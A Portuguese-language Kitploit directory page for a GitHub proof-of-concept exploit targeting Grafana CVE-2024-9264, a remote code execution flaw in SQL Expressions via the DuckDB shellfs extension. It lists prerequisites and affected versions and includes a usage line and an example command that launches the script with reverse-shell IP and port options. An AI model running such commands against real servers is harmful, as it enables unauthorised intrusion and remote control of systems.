Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9264-RCE-Exploit — Exploit RCE Grafana (CVE-2024-9264) | Kitploit
Ferramentas/GitHubGitHub/z3k0sec/cve-2024-9264-rce-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubz3k0sec/cve-2024-9264-rce-exploit

CVE-2024-9264-RCE-Exploit

Exploit RCE Grafana (CVE-2024-9264)

Ver Repositório
395há 1 anoRevisado pelo Kitploit
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9264-RCE-Exploit no Grafana via Expressões SQL

Descrição

Prova de Conceito para Execução Remota de Código no Grafana (CVE-2024-9264)

Este repositório contém um script Python que explora uma vulnerabilidade de Execução Remota de Código (RCE) no recurso de Expressões SQL do Grafana. Ao aproveitar a sanitização insuficiente de entrada, este exploit permite que um atacante execute comandos shell arbitrários no servidor. Isso é possível através da extensão comunitária shellfs, que pode ser instalada e carregada por um atacante para facilitar a execução de comandos.

Pré-requisitos

  • usuário autenticado do Grafana com permissões de Viewer ou superiores
  • o binário do DuckDB deve estar instalado e acessível através do PATH do Grafana

Versão afetada

Grafana >= v11.0.0 (todas as v11.x.y são afetadas)

Uso

root@kitploit:~
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

Exemplo

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

Aviso Legal

Este script é destinado a fins educacionais e para uso em ambientes controlados onde você tem permissão para testar a segurança do sistema. O uso indevido desta ferramenta pode acarretar consequências legais.

Mais

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

Baixar ferramenta